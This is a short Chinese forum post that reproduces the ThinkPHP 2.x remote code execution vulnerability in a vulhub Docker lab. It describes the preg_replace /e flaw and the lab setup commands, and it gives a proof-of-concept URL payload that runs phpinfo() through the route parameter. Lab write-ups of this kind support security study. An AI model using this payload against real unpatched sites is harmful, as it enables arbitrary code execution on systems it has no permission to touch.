thinkphp2rce漏洞复现

讨论社区 / 日志 / 帖子详情

thinkphp2rce漏洞复现

2022-07-28 14:14:58

298

0x01 漏洞描述
描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞

0x02 影响版本
影响Thinkphp 2.x的版本

0x03 漏洞利用

root权限启动docker（我用kali不给root没法搭建环境）

sudo susystemctl start docker

查看docker进程

ps -ef | grep docker

进入thinkphp目录选择2-rce搭建环境

cd vulhubcd thinkphpcd 2-rcedocker-compose up -d

查看docker搭建的ip地址

docker inspect 容器ID

环境搭建成功

poc：

?s=/index/index/name/${@phpinfo()}

漏洞复现成功

上一页：thinkphp 后台管理框架swiftadmin的使用

下一页：thinkphp5中如何设置session

回帖

全部回帖（{{commentCount}}）

{{item.like > 0 ? item.like : '点赞'}} {{item.comment_content_show ? '取消' : '回复'}} 删除

回帖

{{reply.like > 0 ? reply.like : '点赞'}} {{reply.comment_content_show ? '取消' : '回复'}} 删除

回帖

收起

没有更多啦~

发帖

一个专属于OneKeyAdmin的技术交流平台，记录OneKeyAdmin开发者的成长与进步。

主题帖

6221

回帖数

143

文章

回帖

文章

粉丝

1 WordPress Rest API 入门详解

2763

2 Thinkphp5.0 获取新增数据的ID

6 Thinkphp6 的 where 查询条件 and 和 or 的操作

1833

7 thinkphp5使用数据库表锁

1624

8 Thinkphp如何查看当前是哪个版本?查看thinkphp当前版本号的三种方法

1621

9 thinkphp6 如何输出json数据

1580

10 h5网站模板_超全超实用的80个模板网站，我全部整理在这里了

1577